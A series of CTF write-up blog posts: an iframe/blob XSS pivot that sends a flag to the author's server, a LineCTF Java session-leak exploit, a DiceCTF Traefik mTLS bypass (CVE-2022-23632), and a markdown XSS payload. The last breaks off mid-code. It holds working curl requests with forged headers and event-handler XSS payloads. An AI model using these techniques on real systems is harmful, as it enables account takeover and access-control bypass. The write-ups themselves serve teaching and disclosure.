Normally the sandbox attribute just takes away rights relative to being unspecified; it doesn't add any rights. However, the docs mentioned both an allow-top-navigation and an allow-top-navigation-by-user-activation sandbox keyword. The latter being the behaviour I seemed to be getting with no sandbox attribute and the former being the behaviour I wanted. It didn't seem like there would be much point in including allow-top-navigation if it was never allowed, so I thought I would try it and see what happened. I changed my iframe to be
 
<iframe src="https://ctf-wiki.chall.lac.tf/view/4568f3f843562569a487b3ee9fb22dcf" sandbox="allow-top-navigation allow-scripts allow-same-origin"></iframe>

Then I visited the page with that iframe: http://ctf-wiki.chall.lac.tf./view/ea313ff4550b824368d39e00936ef58d (Note the dot after the tf TLD, which ensures no cookies are sent, so we are logged out. This page needs to be on the weird domain so that no cookies are sent and the page shows our XSS. The iframe needs to frame the real domain. It also won't send cookies, since it is a cross-domain iframe, but it has to be the real domain because the blob inherits its origin and we want the blob to be on the real domain.)

And it worked!

The page with the iframe loaded the second page inside the iframe. That page was cookie-less, but created the blob url with the second stage script. It navigated the top window to the blob script, which was now running at the top level, so all the fetch() requests it made had the appropriate cookies. It fetched the flag, and then sent the flag to my website as part of the name of a fake "image" file. I could then see the flag in my apache access log.
 
107.178.207.72 - - [18/Feb/2024:04:43:45 +0000] "GET /?flag=lactf%7Bk4NT_k33P_4lL_my_F4v0r1T3_ctF3RS_S4m3_S1t3%7D HTTP/1.1" 200 3754 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/121.0.0.0 Safari/537.36"
 
Thus the flag is: lactf{k4NT_k33P_4lL_my_F4v0r1T3_ctF3RS_S4m3_S1t3}
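For completeness, the percent-decoding step from the log line to the flag can be reproduced with a few lines of Python. This is only a convenience sketch; the request path is copied from the access log entry above.

```python
from urllib.parse import parse_qs, urlsplit

# Request path copied from the access log line above.
logged_path = "/?flag=lactf%7Bk4NT_k33P_4lL_my_F4v0r1T3_ctF3RS_S4m3_S1t3%7D"

# parse_qs percent-decodes the parameter values (%7B -> "{", %7D -> "}").
flag = parse_qs(urlsplit(logged_path).query)["flag"][0]
print(flag)
```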
 

Conclusion

It is indeed possible to pivot from an XSS in an iframe, to an XSS that can read data that is partitioned to the main site, without using a pop-up. Of course the situation of having an XSS when not logged in but no XSS when actually logged in is pretty contrived. I do wonder if there are situations in the real world where using blobs to bypass SameSite cookies is applicable. I find it hard to imagine - an XSS attack is usually powerful enough to make things game over. It would be unusual that you couldn't leverage that directly.
 
The most realistic scenario I could think of where this blob behaviour might be useful would be to break out of credentialless iframes. Credentialless iframes are used for cross-origin isolated contexts (when you want your website to not be in the same process as any other website, in order to prevent speculative execution type attacks) and are not allowed to have references to window objects of pop-ups. Thus the usual attacks with pop-ups cannot be done. However the blob: url method can still work to turn an XSS in a credentialless context into one that can make credentialed requests.

Anyways. It is quite weird that blobs are exempt from cache partitioning. I wonder how long that will last.



Wednesday, March 29, 2023

CTF Writeup: Memento from LineCTF 2023

 Over the weekend I participated in LineCTF 2023. This was a really fun CTF with lots of great web challenges. Often web challenges in CTFs are either really contrived, really guessy or really easy. It was nice to see a CTF with a large number of high quality web challenges that were challenging while still feeling realistic and not guess based.

Overall I didn't get too many challenges during the competition. However I did solve one challenge that nobody else did: Memento. It was the only web challenge to have only one solve, and I honestly feel pretty proud of myself for getting it. Not to mention that it makes me feel a lot better about having no idea how to solve most of the other problems :). In the end I came 28th with 601 points.

The challenge

We are given a Java Spring application that allows you to store notes and view the list of notes you have previously stored. The notes themselves are not access controlled, but are stored under an unguessable UUID. There is an admin bot which you can ask to look at a url. If you do, it will store a note containing the flag and then look at the url of your choosing.

To trigger this bot action there is a /bin/report endpoint:

    @RequestMapping("/report")
    public String report(@RequestParam String urlString) throws Exception {
        URL url = new URL(urlString);
        HttpClient.newHttpClient().send(HttpRequest.newBuilder(new URI("http://memento-admin:3000/?url=" + url.getPath())).build(), HttpResponse.BodyHandlers.ofString()).body();
        return "redirect:/" + url.getPath() + "#reported";
    }

 

Which then triggers a node.js app that runs headless chromium:

            // post flag as anonymous user
            console.log(origin + "/bin/create");
            await page.goto(origin + "/bin/create");
            await page.type("textarea", FLAG);
            await page.click("button");

            // visit to reported url
            await page.goto(origin + url);

 

The other important endpoints are the list and create endpoints:

    @GetMapping("/list")
    public String binList(Model model) {
        if (authContext.userid.get() == null) return "redirect:/";
        model.addAttribute("bins", userToBins.get(authContext.userid.get()));
        return "list";
    }


    @PostMapping("/create")
    public String create(@RequestParam String bin) {
        String id = UUID.randomUUID().toString();
        if (userToBins.get(authContext.userid.get()) == null) {
            userToBins.put(authContext.userid.get(), new ArrayList<String>());
        }
        userToBins.get(authContext.userid.get()).add(id);
        idToBin.put(id, bin);
        return "redirect:/bin/" + id;
    }

 

Not an XSS

At first glance, I assumed this was going to be some sort of XSS. Typically when you see a bot process that does something with confidential data then goes to a url of your choosing it is some sort of client side vulnerability. However, I looked, and there was clearly no opportunity for XSS or more obscure client-side data leaks.

If not XSS, then where to next? If it's not client side, we must need to get the secret note directly somehow. Guessing the UUID seemed impossible, so that left the /list endpoint. Clearly we needed some way to see the list of the admin bot's notes. With that in mind, maybe there is something about session generation that would allow us to steal their session. Here is the session auth code:

public class AuthInterceptor implements HandlerInterceptor {

    @Autowired
    private AuthContext authContext;

    private static String COOKIE_NAME = "MEMENTO_TOKEN";

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        Cookie cookie = WebUtils.getCookie(request, COOKIE_NAME);
        if (cookie != null && !cookie.getValue().isEmpty()) {
            try {
                String token = cookie.getValue();
                String userid = JwtUtil.verify(token);
                authContext.userid.set(userid);
                return true;
            } catch (Exception e) {
                // Failed to verify jwt
            }
        }
        String userId = UUID.randomUUID().toString();
        cookie = new Cookie(COOKIE_NAME, JwtUtil.sign(userId));
        cookie.setPath("/");
        response.addCookie(cookie);
        return true;
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
        authContext.userid.remove();
    }
}

public class AuthContext {
    public ThreadLocal<String> userid = new ThreadLocal<String>();
}

Alright, so the app checks if the user has a cookie. If not, it gives them a new JWT cookie with a session id. The current user's id is stored in thread local storage at the beginning of the request, and cleared at the end of the request.

First thing I tried was the usual JWT vulns, setting alg = NonE, etc but to no avail.

However, one thing did stand out in this code - the postHandle. The current user id is essentially being stored in a (thread specific) global variable. I'm not that familiar with Java, but given that it is explicitly being cleared towards the end of the request, one assumes that that is necessary and otherwise the thread local storage would persist across HTTP requests.

Attacking session lifetime

Thus an (incorrect) plan started to form based on a session fixation attack:

  • Somehow cause postHandle() not to be run at the end of the request
  • Send a request to fix the session to one of my choosing
  • Have the admin bot go post something under my chosen session
  • View the /bin/list endpoint with my chosen session cookie, thus getting the id of the flag note
  • Fetch the flag

I'll get to the incorrect assumption I made here in a little bit. First things first, how do we make postHandle() not run?

We need some way to change the control flow of the process to bypass the postHandle. A good way to alter the control flow of a program is to throw an exception. Luckily for us, Java requires methods to declare the exceptions they throw, so it's really easy to see possible triggers. As we can see from the code, the report endpoint can throw an exception. A quick look at the Java docs shows that the URI constructor can throw a "URISyntaxException - If the given string violates RFC 2396, as augmented by the above deviations".

This all sounds very promising. After all, we control the URL that we are reporting. Some quick experiments later, and it seems like having a url with %7F in it triggers a 500 error. This looks really promising.
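To make the idea concrete, here is a small Python simulation of the pattern (not the challenge's Java code). threading.local stands in for AuthContext.userid, handle() is a made-up stand-in for the preHandle / handler / postHandle sequence, and a single worker thread is used so that every request is guaranteed to land on the same thread.

```python
import threading
from concurrent.futures import ThreadPoolExecutor

auth = threading.local()  # plays the role of AuthContext.userid


def handle(cookie, handler):
    """One simulated request: preHandle, the handler, then postHandle."""
    if cookie is not None:
        auth.userid = cookie  # valid cookie: remember who this is
    # No cookie: a fresh one would be issued here, but (as in preHandle)
    # auth.userid is left untouched, so a stale value survives.
    result = handler()
    auth.userid = None  # postHandle: never reached if handler() raised
    return result


def list_bins():
    # Stand-in for /bin/list: report whose notes would be shown.
    return getattr(auth, "userid", None)


def report_bad_url():
    # Stand-in for /bin/report blowing up on a malformed url.
    raise ValueError("simulated URISyntaxException")


# One worker thread, so all three requests share the same thread-local.
with ThreadPoolExecutor(max_workers=1) as pool:
    before = pool.submit(handle, None, list_bins).result()
    try:
        pool.submit(handle, "victim", report_bad_url).result()
    except ValueError:
        pass
    after = pool.submit(handle, None, list_bins).result()

print(before, after)
```

The cookie-less request after the failed one sees the previous user's id, which is the behaviour the curl experiment below checks for on the real application.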

So let's test this theory. Can we retrieve the bin list without specifying the cookie?

curl 'http://172.17.0.1:10000/bin/create' --data 'bin=MyTest' -i -H 'Cookie: MEMENTO_TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI4ZDA3NDY5ZC1jMmM5LTRkNzItYWMyYS0xZjRkMTA4YmFjMDAifQ.MtOeLRzaBI_y97M_Pr0eQ56bZwVia2tMGpUspj_NEGg' | grep Location

Location: http://172.17.0.1:10000/bin/bcab05e5-2fb6-4b8c-aed5-1a18c5fde4be

curl 'http://172.17.0.1:10000/bin/report?urlString=http://172.17.0.1:10000/bin/%7f' -i -H 'Cookie: MEMENTO_TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI4ZDA3NDY5ZC1jMmM5LTRkNzItYWMyYS0xZjRkMTA4YmFjMDAifQ.MtOeLRzaBI_y97M_Pr0eQ56bZwVia2tMGpUspj_NEGg'

{"timestamp":"2023-03-29T14:35:17.546+00:00","status":500,"error":"Internal Server Error","path":"/bin/report"}

curl 'http://172.17.0.1:10000/bin/list' -i

[Repeat a few times to account for multiple threads]

[..]

            <tr class="row">
                <td>
                    <a href="/bin/bcab05e5-2fb6-4b8c-aed5-1a18c5fde4be">bcab05e5-2fb6-4b8c-aed5-1a18c5fde4be</a>
                </td>
            </tr>
[..]


Success! We were able to run the list command getting the results for the previous user without including their cookie.

Translating to a real attack

Initially my plan of attack was:

  • Make the exception be thrown to fix the session. Repeat several times to hit all the threads
  • Report a url
  • Assume the admin bot will make a post to a thread that has the fixed session
  • View the list endpoint using my cookie

This did not work. So I took another look at what the admin bot actually does:

            // post flag as anonymous user
            console.log(origin + "/bin/create");
            await page.goto(origin + "/bin/create");
            await page.type("textarea", FLAG);
            await page.click("button");

            // visit to reported url
            await page.goto(origin + url);

I had originally seen the "// post flag as anonymous user" comment and assumed that meant that normally it is posted without any cookies. However that is wrong. First the bot makes a GET request to load the form, which sets up the cookies. Thus the flag POST is actually authenticated and not anonymous.

This led to a new plan of attack:

  • Have the reported url, which the bot goes to after posting the flag, trigger the exception
  • The session will now be fixed to whatever was used to POST the flag
  • View the list of notes with no cookie, repeating multiple times until we get the thread with the fixed session that the admin bot used.

Specifically, we'll do:

curl 'http://176.17.0.1:10000/bin/report?urlString=http://176.17.0.1:10000/bin/report%253furlString=http://176.17.0.1:10000/bin/%257f'

followed by a bunch of

curl 'http://34.84.65.148:31337/bin/list'

Eventually I got the list including the name of the note with the flag, and curled that note.

Success!
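The doubly-encoded urlString value in the report command above can be built mechanically. The Python sketch below uses the local test address from the earlier commands as a placeholder and leaves ':', '/' and '=' unencoded, as in the curl command. My understanding is that each hop on the way to the bot strips one layer of encoding, but that is an assumption the sketch does not verify; it only shows that two rounds of decoding recover the inner request.

```python
from urllib.parse import quote, unquote

BASE = "http://172.17.0.1:10000"  # placeholder: local test instance

# What the bot should end up requesting: the report endpoint,
# given a url that contains a raw DEL (0x7f) character.
inner = f"{BASE}/bin/report?urlString={BASE}/bin/\x7f"

# Percent-encode twice: '?' -> %3F -> %253F and DEL -> %7F -> %257F.
once = quote(inner, safe=":/=")
twice = quote(once, safe=":/=")

report_url = f"{BASE}/bin/report?urlString={twice}"
print(report_url)

# Two rounds of decoding give back the inner request.
print(unquote(unquote(twice)) == inner)
```

Python emits upper-case hex digits (%253F rather than %253f); percent-encoding is case-insensitive, so the two forms are equivalent.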

Then I tried it on the real server, but kept getting 404 not found from openresty. Eventually I realized there was an additional cookie I needed for the real server. Guess I was pretty tired at that point. Once I fixed that, we succeeded:

LINECTF{d43f859493cc297c18c68ad241ba04de}

Conclusion

This was a fun challenge. One that was very fresh, but also seemed realistic.

I will say to all the PHP haters out there, that this sort of thing could never happen in PHP ;)


Monday, July 18, 2022

Write up DiceCTF 2022: Flare and stumbling upon a Traefik 0-day (CVE-2022-23632)

 A while back, I participated in DiceCTF. During the contest I was the first person to solve the problem "Flare".

This was pretty exciting. Normally I'm happy just to be able to solve a problem — I'm never first. Even better though, my solution wasn't the intended solution, and I had instead found a 0-day in the load balancing software the contest was using!

The contest was a while ago so this post is severely belated. Nonetheless, given how exciting this all was, I wanted to write it up.

The Problem

The contest problem was short and sweet. You had a flask app behind Cloudflare. If you accessed it with an internal IP address (e.g. 192.168.0.2 or 10.0.0.2), you get the flag. The entire code is just 18 lines, mostly boilerplate:

import os
import ipaddress

from flask import Flask, request
from gevent.pywsgi import WSGIServer

app = Flask(__name__)
flag = os.getenv('FLAG', default='dice{flag}')

@app.route('/')
def index():
    ip = ipaddress.ip_address(request.headers.get('CF-Connecting-IP'))

    if isinstance(ip, ipaddress.IPv4Address) and ip.is_private:
        return flag

    return f'No flag for {format(ip)}'

WSGIServer(('', 8080), app).serve_forever()
  

Avenues of Attack

Simple to understand, but how to attack? The direct approach seems unlikely. The service is behind Cloudflare: if we could trick Cloudflare into thinking we are connecting to a site from an arbitrary IP address, that would be a very significant vulnerability. If we could actually make a TCP connection to Cloudflare from an IP address that should not be globally routable, then something is seriously wrong with the internet.

Thinking about it, it seems like the following approaches are possible:

  • Hack Cloudflare to send the wrong CF-Connecting-IP header (Seems impossible)
  • Use some sort of HTTP smuggling or header normalization issue to send something that Flask thinks is a valid CF-Connecting-IP header, but Cloudflare doesn't recognize, and hope that when faced with 2 conflicting headers, Flask chooses ours instead of Cloudflare's. (Also seems impossible)
  • Find the backend server and connect to it directly, bypassing Cloudflare, allowing us to send whatever header we want


 With that in mind, I figured it had to be the third one. After all, this is a challenge, so it must have a solution, hence I figured it's probably neither impossible nor involving a high value vulnerability in a major CDN.

I was wrong of course. The intended solution was sort of a combination of the first possibility, which I dismissed as impossible, and Python having an "interesting" definition of an "internal" IP, which there is no way I ever would have gotten. More on that later.

Trying to Find the Backend

So now that I determined my course of action, I started hunting for the backend server. I tried googling around for snippets from the page to see if any other sites came up in google with the same text. I tried looking at various "dns history" sites that were largely useless. I tried certificate transparency logs, but no. I even tried blindly typing in variations on the challenge's domain name.

The setup for the challenges was as follows: This challenge was on https://flare.mc.ax. The other challenges were all on *.mc.ax. This was the only challenge served by Cloudflare, the rest were served directly by the CTF infrastructure using a single IP address and a wildcard certificate.

With that in mind, I thought, maybe I could connect to the IP serving the other challenges, give the flare.mc.ax SNI and host header, and perhaps I will be directly connected to the backend. So I tried that, as well as the domain fronting version where you give the wrong SNI but the right host header. This did not work. However, to my surprise instead of getting a 404 response, I got a 421 Misdirected Request.

421 essentially means you asked for something that this server is not configured to give you, so you should re-check your DNS resolution to make sure you have the right IP address and try again. In HTTP/2, you are allowed to reuse a connection for other domains as long as it served a TLS certificate that would work for the other domain (This is called "Connection coalescing"). However, sometimes that back-fires, especially with wildcard certs. Just because a server serves a TLS certificate for *.example.com doesn't mean it knows how to literally handle everything under example.com, since some subdomains might be served by a different server on a different IP. The new error code was created for such cases, to tell the browser it should stop with the connection coalescing, look up the DNS records for the domain name again, and open a separate connection. We needed a new code, because if the server just responded with a 404, the browser wouldn't know if it's because the page just doesn't exist, or if it's because the connection was inappropriately coalesced.

Looking back, I'm not sure I should have seen this as a sign. After all I was asking for a domain name that this server did not serve but had a correct certificate for, so this was the appropriate HTTP status code to give. However, the uniqueness of the error code and sudden change in behaviour around the domain name I was interested in, made me feel like I was on to something.

So I tried messing around with variations in headers and SNI. I tried silly things like having Host: flare.mc.ax/foo in the hopes that it would maybe confuse one layer, but another layer would strip it off, and get me the site I wanted or something like that.

Why settle for partial qualification? 

Eventually I tried Host: flare.mc.ax. (note the extra dot at the end) with no SNI.

curl 'https://104.196.60.107' -vk --header 'host: flare.mc.ax.' --http1.1 --header 'CF-Connecting-IP: 127.0.0.1' --header 'X-Forwarded-For: 127.0.0.1' --header 'CF-ray: REDACTED' --header 'CF-IPCountry: CA' --header 'CF-Visitor: {"scheme":"https"}' --header 'CDN-Loop: cloudflare'

It worked.

Wait what?

What does a dot at the end of a domain name even mean?

In DNS, there is the concept of a partially qualified domain name (PQDN), and its opposite, the fully qualified domain name (FQDN). A partially qualified domain name is similar to a relative path - you can set up a default DNS search path in your DNS config (usually set by DHCP) that acts as a default suffix for partially qualified domain names. For example, if your default search path is example.com and you look up the host foo, DNS will check foo.example.com.

I imagine this made more sense during the early internet, when it was more a "network of networks", and it was more common that you wanted to look up local resources on your local network.

In DNS, there is the root zone, which is represented by the empty string. This is the top of the DNS tree, which has TLDs like com or net, as its children.

If you add a period to the end of your DNS name, for example foo., this tells the DNS software that it isn't a partially qualified DNS name, but what you actually want is to look up the foo domain in the root zone. So it does not look up foo.example.com., but instead just foo..
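The difference can be sketched in a few lines of Python. This is a deliberately simplified model of a stub resolver (real resolvers have extra rules about when and in what order the search path is consulted), and lookup_candidates is a made-up helper name.

```python
def lookup_candidates(name, search_path):
    """Names a simplified stub resolver would try, in order (illustrative only)."""
    if name.endswith("."):
        # Fully qualified: the search path is never consulted.
        return [name]
    # Partially qualified: try each search suffix, then the bare name.
    return [f"{name}.{suffix}." for suffix in search_path] + [f"{name}."]


print(lookup_candidates("foo", ["example.com"]))
print(lookup_candidates("foo.", ["example.com"]))
```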

For the most part, this is an obscure bit of DNS trivia. However, as far as web browsers are concerned, the PQDN example.net and FQDN example.net. are entirely separate domains. The same origin policy treats them differently, cookies set to one do not affect the other (TLS certificates seem to work for both though). In the past, people have used this trick to avoid advertisers on some websites.

So why did this work

So at this point, I solved the puzzle, obtained the flag and submitted it. Yay me!
 
But I still wasn't really sure what happened. I assumed there was some sort of misconfiguration involved, but I wasn't sure what. I did not have the configuration of the load-balancer. For that matter, I wasn't even sure yet which load balancing software was in use.

After I solved the problem, the competition organizers reached out and asked me what method I used. I imagine they wanted to see if I found the intended solution or stumbled upon something else. When I told them, they were very surprised. Apparently mutual TLS had been set up with Cloudflare, and it should have been impossible to contact the backend if you did not have the correct client certificate, which I did not.

Wait what!?

The load balancing software in question was Traefik. In it, you can configure various requirements for different hosts. For example, you can say that a certain host needs a specific version of TLS, specific ciphers, specific server certificate or even a specific client certificate (mTLS). There is also a section for default options. In this case, they had one set of TLS settings for most of the domains, and a rule for the flare domain that you needed the correct client certificate to get access.

In normal operation, the SNI is checked and the appropriate requirements are applied. In the event that the SNI doesn't match the host header, and the host header matches a domain with different TLS requirements than the default requirements, a 421 status code is sent. This is all good.

However, if the host header has a period at the end to make it a FQDN, the code checking the TLS requirements doesn't think it matches the non-period version, so only the default requirements apply. However the rest of the code will still forward the request to the correct domain and process it as normal.

Thus, you can bypass any domain specific security requirements by not sending the SNI and adding an extra period to the host header.
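The shape of the bug can be modelled in a few lines of Python. To be clear, this is not Traefik's code: the tables, the option names and both functions are invented for illustration, and the only point is that one lookup compares the host name exactly while the other normalises it first.

```python
# Hypothetical per-host TLS requirements; hosts without an entry get the default.
TLS_OPTIONS = {"flare.mc.ax": "require-client-cert"}
# Hypothetical routing table mapping host names to backends.
ROUTES = {"flare.mc.ax": "flare-backend"}


def tls_options_for(host):
    # Exact string comparison: "flare.mc.ax." is not "flare.mc.ax".
    return TLS_OPTIONS.get(host, "default")


def route_for(host):
    # Routing normalises the name, so the trailing dot is ignored here.
    return ROUTES.get(host.rstrip("."))


for host in ("flare.mc.ax", "flare.mc.ax."):
    print(host, tls_options_for(host), route_for(host))
```

With the trailing dot, the request is still routed to the protected backend but is only held to the default TLS requirements.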

This would be one thing for settings like min TLS version. However, it is an entirely different thing for access control settings such as mutual TLS as it allows an attacker to fully bypass the required client certificate, getting access to things they shouldn't be able to.

I reported this to the Traefik maintainers, and they fixed the issue in version 2.6.1. It was assigned CVE-2022-23632 and you can read more about it in their advisory. This was pretty exciting as well, as Traefik is used by quite a few people, and based on their GitHub security advisory page, this is the first high-severity vulnerability that has been found in it.

What was the intended solution?

I found out later from the organizers of the CTF that the intended solution was something very different. I definitely would never have come up with this myself.

The intended solution was to exploit two weird behaviours:

  • The Python ipaddress library considers class E IP addresses (i.e. 240.0.0.0/4) to be "private". Class E addresses are reserved for future use. They are not globally routable, but they aren't private either, so it is odd that Python considers them private. Python's own docs say that is_private is "True if the address is allocated for private networks" linking to IANA's official list, even though 240.0.0.0/4 is not listed as private use on that list.
  • Cloudflare has a feature where if your site does not support IPv6, you can enable "Pseudo IPv4", where the IPv6 connections will be forwarded as if they come from a class E IPv4 address. Cloudflare talks more about it in their blog post.

Which is a pretty fascinating combination.
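The first behaviour is easy to check locally. The sketch below wraps the same test that the challenge's index() handler performs in a helper (would_get_flag is my own name for it) and tries it on a few addresses; 240.0.0.1 is just an arbitrary address picked from the class E range.

```python
import ipaddress


def would_get_flag(cf_connecting_ip):
    """Same test as the challenge's index() handler."""
    ip = ipaddress.ip_address(cf_connecting_ip)
    return isinstance(ip, ipaddress.IPv4Address) and ip.is_private


# An RFC 1918 address, a public address, and an arbitrary class E address.
for candidate in ("10.0.0.2", "8.8.8.8", "240.0.0.1"):
    print(candidate, would_get_flag(candidate))
```

If the class E address passes, then any Pseudo IPv4 address Cloudflare hands to the backend would pass as well.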

Initially I discarded the possibility that you could make Cloudflare give the wrong IP address, because I thought that would be such a major hack that it wouldn't show up in this type of contest; people would either be reporting it or exploiting it, depending on the colour of their hat. However, my assumption was based on the idea that any sort of exploit would let you pick your IP. Being able to present as a random class E address (the address is based on an md5 hash of the top 64 bits of your IPv6 address, so you cannot choose it) is nowhere near as useful as being able to choose your IP (everyone is just so trusting of 127.0.0.1).

While this is a fascinating challenge, it's hard to imagine a non-contrived situation where this would be a useful primitive. Making network access control in the real world that just blacklists all globally routable IPs instead of allowing only your own network seems silly. Even sillier would be to whitelist class E for some reason. Sure, I guess an attacker could masquerade as one of these class E addresses to confuse anti-abuse systems, but if the site properly processes those connections, then it seems anti-abuse systems are likely to handle them just as easily as a normal IP. Since it's still tied to your real IP, you can't hop between them unless you can hop between real IPs. If it ever really became an issue, Cloudflare lets you disable them, and there is also an additional header with the original IPv6 address you can use. At worst, maybe it makes reading logs after an incident more complicated, but this would be a really bad way to hide yourself in a world where VPNs are cheap and Tor is free.

In conclusion: it's a fascinating behaviour, but practically speaking it doesn't seem exploitable in the way that "make Cloudflare report your ip is something other than your ip" sounds like it would be exploitable at first glance.

 

 

Tuesday, February 8, 2022

Write up for DiceCTF 2022: nocookies

Last weekend I participated in DiceCTF. There were some very interesting challenges and I had a lot of fun. Here is a write-up for one of the challenges I solved.

For this challenge, we're presented with a note-keeping app. It allows storing either plaintext or markdown notes. The main distinction is instead of using cookies, it just asks you for a password on every page load.

The admin bot

The challenge also includes an admin bot, that you can give urls to, to visit. Here is a snippet from its code:

    // make an account
    const username = Array(32)
      .fill('')
      .map(() => Math.floor(Math.random() * 16).toString(16))
      .join('');
    const password = flag;

    const firstLogin = doLogin(username, password);

    try {
      page.goto(`https://no-cookies-${instance}.mc.ax/register`);
    } catch {}

    await firstLogin;

    await sleep(3000);

    // visit the note and log in
    const secondLogin = doLogin(username, password);

    try {
      page.goto(url);
    } catch {}

    await secondLogin;

As we can see from the bot code, it creates an account with a random username, with the password being the flag which we are trying to obtain. Since it first visits one page, and then a second of our choosing, this is a strong hint that the intended solution is some sort of XSS to exfiltrate the password.

The view code

Since I suspected that we were looking for an XSS, and I knew the app supported markdown, a good first place to look was the markdown rendering code. This happened entirely client-side on the view note page. Here is the relevant snippet.

<script>
  (() => {
    const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

    const promptValid = (text) => {
      let result = prompt(text) ?? '';
      return validate(result) ? result : promptValid(text);
    }

    const username = promptValid('Username:');
    const password = promptValid('Password:');

    const params = new URLSearchParams(window.location.search);

    (async () => {
      const { note, mode, views } = await (await fetch('/view', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          username,
          password,
          id: params.get('id')
        })
      })).json();

      if (!note) {
        alert('Invalid username, password, or note id');
        window.location = '/';
        return;
      }

      let text = note;
      if (mode === 'markdown') {
        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

        text = text.replace(/#\s*([^\n]+)/g, (match, p1) => {
          return `<h1>${p1}</h1>`;
        });
        text = text.replace(/\*\*([^\n]+)\*\*/g, (match, p1) => {
          return `<strong>${p1}</strong>`;
        });
        text = text.replace(/\*([^\n]+)\*/g, (match, p1) => {
          return `<em>${p1}</em>`;
        });
      }

      document.querySelector('.note').innerHTML = text;
      document.querySelector('.views').innerText = views;
    })();
  })();
</script>
 

The first thing I was drawn to was this part:

        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

Which looks for syntax like [Link text](https://urltolinkto.com) and replaces it with a link. A keen eye would notice that the url is allowed to contain double quotes ("), which don't get escaped. This allows you to make extra attributes on the <a> tag. For example [link text](http://example.com" class="foo) gets turned into <a href="http://example.com" class="foo">link text</a>. This can be used as an XSS by using html event handlers. For example, [link](https://example.com" onmouseover="alert`1`) will make an alert box if you hover over the link with your mouse.
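The attribute injection is easy to reproduce outside the browser. Here is a Python port of just the link substitution, using the same regular expression as the page's script (square brackets for the link text, followed by parentheses for the url); render_links is a made-up name for this sketch.

```python
import re

# Same pattern as the page's script: [text](url), with no escaping of the url.
LINK = re.compile(r"\[([^\]]+)\]\(([^\)]+)\)")


def render_links(text):
    # Group 2 (the url) is dropped into href="..." verbatim, quotes and all.
    return LINK.sub(lambda m: f'<a href="{m.group(2)}">{m.group(1)}</a>', text)


print(render_links('[link text](http://example.com" class="foo)'))
```

The double quote in the url closes the href attribute early, and everything after it becomes a new attribute on the tag.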

A lack of user interaction 

However, the admin bot doesn't have a mouse, and doesn't interact with the page. So how do we make the XSS trigger? We can't tell it to hover over the link.

This took me a little while, because I was testing on Firefox, but the admin bot uses Chrome, and the behaviour is mildly different. Eventually though, I found out that in Chrome you can use the autofocus attribute to force focus to the element, and use an onfocus handler to execute code:

[foo](http://example.com" autofocus=autofocus onfocus="alert`1`)

This will pop the alert box immediately on page view, including for the admin bot.

Problem solved right? Wait...

With that, I assumed I had solved the problem. All I had to do was read the password variable and send it off to a web server I control.

So to check if that would work, first I tried:


[foo](http://example.com" autofocus=autofocus onfocus="alert(password&#x29;)

Note: The ) had to be escaped as &#x29; because the regex stops at the first ")".

...and got a pop-up saying "undefined". Whoops. Looking back at the view code, I see that const password is defined inside an anonymous arrow function, and my code is executing outside of it (since it's coming from an HTML event handler), so the password variable is not in scope.
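The scoping problem can be approximated outside the browser. This is only a sketch: new Function stands in for the inline event handler, since both are compiled from a string and neither closes over the arrow function's locals. A real inline handler also has the element and document on its scope chain, which this does not model. The password value is made up.

```javascript
// Stand-in for the page script: password exists only inside this function.
(() => {
  const password = 'hunter2'; // hypothetical value
  void password;
})();

// Stand-in for the inline event handler: compiled from a string,
// so it cannot see the closure above.
const handlerStandIn = new Function('return typeof password;');
const typeSeenByHandler = handlerStandIn();

console.log(typeSeenByHandler);
```

Whatever the handler finds under the name password, it is not the const from the page script, so a different way to reach the value is needed.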

At this point, I got stumped for a little bit.

Looking back at the code, I noticed that it was validating the password a bit weirdly:

    const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

It was basically checking that the password has at least 1 character, and does not contain apostrophes or dollar signs, which is just a bit random. If this was actually important you would do it on the server side. In a CTF, one of the key things to do is look for code that sticks out, or code that looks like something you wouldn't normally write when writing software. This validate function looked a bit suspicious to me, although to be honest, I only thought that because I was fairly stuck at this point.

I had a vague memory of early JS having some weird design choices around regexes, so I decided to read up on RegExp in JavaScript. Eventually I found this page, https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/input, which was very relevant to the matter at hand.

In short, whenever a regex matches in JavaScript, JS saves the text you ran it on as a static property of RegExp, and you can access it later by looking at RegExp.input.

This is first of all crazy (thanks, JS). However, it seemed perfect for this situation. I assumed that since the password was the last thing .test() was run on, I could obtain it from RegExp.input.

However, there was a problem. All the .replace() calls from the markdown parsing also set RegExp.input, overwriting the password. It seemed like I was at an impasse.
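Both halves of this can be seen in a few lines. A minimal sketch, assuming a V8-based engine (Chrome or Node), where the legacy RegExp.input property is available. The validate function and the link regex are taken from the challenge; the password and note values are made up.

```javascript
// The challenge's client-side password check.
const validate = (text) => /^[^$']+$/.test(text ?? '');

// After a successful match, the tested string is left behind on RegExp.input.
validate('hunter2'); // hypothetical password
const inputAfterValidate = RegExp.input;

// A later regex match (here, the markdown link replace) overwrites it.
'[a](b)'.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (m, p1, p2) => `<a href="${p2}">${p1}</a>`);
const inputAfterMarkdown = RegExp.input;

console.log(inputAfterValidate);
console.log(inputAfterMarkdown);
```

So the password is recoverable right after validation, but only until the next regex matches. Since the markdown XSS relies on the link regex matching, it destroys the value it is trying to steal.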

The app did support plaintext notes, which wouldn't run the problematic .replace() calls. If I could somehow get an XSS into a plaintext note, then I could use the RegExp.input trick.

Perhaps the markdown XSS I found was a red herring, and I needed to look elsewhere.

 On to an SQL injection

Looking at the view code, if the note is a plaintext note, then it is inserted directly into the document without any escaping on the client side. All the escaping takes place on the backend at insert time. Let's take a look at the backend code:

 const db = {
  prepare: (query, params) => {
    if (params)
